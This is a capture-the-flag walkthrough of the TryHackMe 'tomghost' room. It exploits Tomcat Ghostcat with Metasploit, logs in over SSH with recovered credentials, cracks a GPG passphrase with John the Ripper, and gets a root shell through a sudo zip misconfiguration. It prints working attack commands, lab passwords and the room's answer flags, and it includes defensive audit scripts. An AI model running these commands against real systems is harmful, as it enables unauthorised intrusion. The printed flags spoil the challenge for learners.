# Challenges: tomghost (TryHackMe)

In this TryHackMe challenge, we’re tasked with compromising a Linux machine by gaining low-privileged access, escalating privileges, and collecting two flags: `user.txt` and `root.txt`. The target system runs Apache Tomcat and has a known vulnerability called **Ghostcat** (CVE-2020-1938). The room offers a mix of enumeration, vulnerability exploitation, key decryption, and privilege escalation. This walkthrough demonstrates a full exploitation path from reconnaissance to root access.

## Flags

![](https://i.imgur.com/fR0jVuM.png align="left")

**Are you able to complete the challenge?**  
The machine may take up to 5 minutes to boot and configure.

*Admins Note: This room contains inappropriate content in the form of a username that contains a swear word and should be noted for an educational setting. - Dark*

### Answer the questions below

Compromise this machine and obtain user.txt `THM{GhostCat_1s_so_cr4sy}`

Start by running an nmap scan:

`nmap -sC -sV 10.10.81.186`

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1751981953321/da2764e7-fb80-4b70-ae4c-3f09a64a3609.png align="center")

Then we check this site:

`http://<IP_Address>:8080`

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1751982036889/bdea427f-90bf-48c0-b9f7-db97d91bda74.png align="center")

The site looked like the official Apache Tomcat documentation page, so we checked whether there is a CVE linked to Tomcat 9.0 that could give us a lead:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1751982202666/4e24fab4-6f62-4714-a47c-564e2b6fb46b.png align="center")

I tried using Metasploit at first, but it wasn’t working right. Later on, after researching through other writeups and ChatGPT, I learned that I was supposed to use Metasploit but search for ghostcat:  
  
`msfconsole`  
  
`search ghostcat`  
  
`use auxiliary/admin/http/tomcat_ghostcat`  
  
`set RHOSTS <IP_Address>`  
  
`exploit`  
  
We’ll get the credentials of the user, which will enable us to get low-privileged access using SSH:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1751997381361/989daef6-acd6-4c02-9f26-d6dfca863f09.png align="center")

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1751998579211/be9e18e3-6d2f-43ba-90d2-59150c08f590.png align="center")
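On the defensive side, Ghostcat (CVE-2020-1938) is reached through Tomcat's AJP connector, so the exposure can be checked in `server.xml`. The following is an added example, not part of the original walkthrough or of Tomcat: it audits two constructed `server.xml` fragments and flags AJP connectors that are not bound to loopback or have no shared secret (`audit_ajp` and both sample configs are assumptions made for the illustration).

```python
import xml.etree.ElementTree as ET

# Constructed server.xml fragments for illustration (not from the target).
EXPOSED = """<Server><Service name="Catalina">
  <Connector port="8080" protocol="HTTP/1.1"/>
  <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
</Service></Server>"""

HARDENED = """<Server><Service name="Catalina">
  <Connector port="8080" protocol="HTTP/1.1"/>
  <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
             secretRequired="true" secret="PLACEHOLDER-LONG-RANDOM-VALUE"/>
</Service></Server>"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def audit_ajp(server_xml):
    """Return one finding string per weakness on each AJP connector."""
    findings = []
    for conn in ET.fromstring(server_xml).iter("Connector"):
        if "ajp" not in conn.get("protocol", "").lower():
            continue  # HTTP connectors are out of scope for Ghostcat
        port = conn.get("port", "?")
        # Missing attributes are treated as unsafe: releases that predate
        # the Ghostcat fix bind AJP to all addresses and need no secret.
        address = conn.get("address")
        if address is None or address not in LOOPBACK:
            findings.append(f"AJP:{port} listens on {address or 'all addresses'}")
        # "requiredSecret" is the older name of the "secret" attribute.
        secret = conn.get("secret") or conn.get("requiredSecret")
        if not secret:
            findings.append(f"AJP:{port} accepts requests without a shared secret")
    return findings


if __name__ == "__main__":
    for name, xml in (("exposed", EXPOSED), ("hardened", HARDENED)):
        print(name, audit_ajp(xml) or "no AJP findings")
```

If no front-end proxy needs AJP, removing or commenting out the connector entirely is the simpler fix.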

`ssh skyfuck@<IP_Address>`

```plaintext
skyfuck:8730281lkjlkjdqlksalks
```

`find / -type f -name user.txt 2> /dev/null`

`cat /home/merlin/user.txt`

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1752005930064/f2f50220-bfc2-4a75-a7e9-9d2b8b839e65.png align="center")

  
  
Checking the files here, we found `tryhackme.asc`, which is an **ASCII-armored** file: a text-encoded format used by **PGP/GPG (Pretty Good Privacy)**. It can contain:

| File Purpose | Description |
| --- | --- |
| 🔑 **Public key** | Shared with others to **encrypt messages** or **verify signatures** |
| 🔒 **Private key** | Kept **secret** to **decrypt messages** or **sign content** |
| 📄 **Encrypted message** | Data encrypted using a public key |
| ✍️ **Signed message** | Message + digital signature |

2. Escalate privileges and obtain root.txt `THM{Z1P_1S_FAKE}`  
    
    `ls`  
    
    `gpg --import tryhackme.asc`
    
    ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1752141157443/7e6bd316-5775-449e-8e7d-9f2856330778.png align="center")
    
    
    On your own machine, download the `.asc` file, convert it to a hash with `gpg2john`, and run John the Ripper against it:  
      
    `wget http://<IP_Address>:8000/tryhackme.asc`  
      
    `gpg2john tryhackme.asc > hashfile`  
      
    `john hashfile --wordlist=/usr/share/wordlists/rockyou.txt`
    
    ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1752140468174/c2603364-0119-48bf-b900-b51a1bd33907.png align="center")
    
    On the victim’s machine, run:  
      
    `gpg --decrypt credential.pgp`  
    passphrase: alexandru
    

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1752141922687/4d233eb3-af0b-4d78-8a28-ef4036275a64.png align="center")

We now have credentials for another user called merlin, so we switch to that account on the victim’s machine:  
  
`su merlin`

password: asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1752142138368/da8dc6c4-e9b2-49b6-a645-a750c64049c7.png align="center")

`sudo -l`

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1752142056382/428a1de0-6335-4810-a8b6-3a27a305c3fd.png align="center")

```bash
cd /tmp
echo "GTFO" > file.txt
sudo zip test.zip file.txt -T --unzip-command="sh -c /bin/sh"
```

  

`whoami`

`find / -type f -name root.txt 2> /dev/null`

`cat /root/root.txt`

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1752142314957/939bb862-9d87-4b42-9917-89e72f83eb10.png align="center")
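The escalation works because a sudo rule for a program that can launch other programs is effectively a rule for a root shell. The following added example (not part of the original walkthrough) shows how a defender could review `sudo -l` output for such rules; the sample output, the `SHELL_CAPABLE` set and the function name are assumptions made for the illustration, and the check goes beyond `zip` to a few other well-known binaries.

```python
import os
import re

# Programs that can launch other programs by design, so a sudo rule for one of
# them amounts to a root shell. zip is the case from this room; the other
# names are a small illustrative sample, not a complete list.
SHELL_CAPABLE = {"zip", "find", "tar", "vim", "less", "awk", "env"}

# "(run_as) [TAG: ...] command[, command ...]" as printed by `sudo -l`.
RULE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$"
)

# Constructed `sudo -l` output: hostname and the second rule are invented.
SAMPLE = """\
Matching Defaults entries for merlin on host:
    env_reset, mail_badpass

User merlin may run the following commands on host:
    (root : root) NOPASSWD: /usr/bin/zip
    (root) /usr/sbin/nginx -t, /usr/bin/find
"""


def risky_sudo_rules(sudo_l_output):
    """Return (run_as, command, reason) for rules that amount to a root shell."""
    hits = []
    for line in sudo_l_output.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # header and Defaults lines carry no rule
        nopasswd = "NOPASSWD" in m.group("tags")
        for cmd in filter(None, (c.strip() for c in m.group("cmds").split(","))):
            binary = os.path.basename(cmd.split()[0])
            if cmd == "ALL":
                reason = "unrestricted sudo"
            elif binary in SHELL_CAPABLE:
                reason = f"{binary} can run arbitrary commands"
            else:
                continue
            if nopasswd:
                reason += " (no password required)"
            hits.append((m.group("runas").strip(), cmd, reason))
    return hits

if __name__ == "__main__":
    for hit in risky_sudo_rules(SAMPLE):
        print(hit)
```

Rules flagged this way are better replaced with a narrowly scoped wrapper script or removed, since restricting arguments in sudoers is easy to get wrong.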

This room provided a great mix of techniques useful in real-world pentesting, including identifying a vulnerable service (Tomcat Ghostcat), accessing sensitive files, cracking the passphrase of a GPG private key to decrypt stored credentials, and escalating privileges using a `sudo` misconfiguration with `zip`. It reinforced the importance of service enumeration, credential discovery, and GPG key handling. The final step, abusing the unzip command option of `zip` under `sudo`, was a rewarding way to achieve root access and read the `root.txt` flag, completing the challenge.
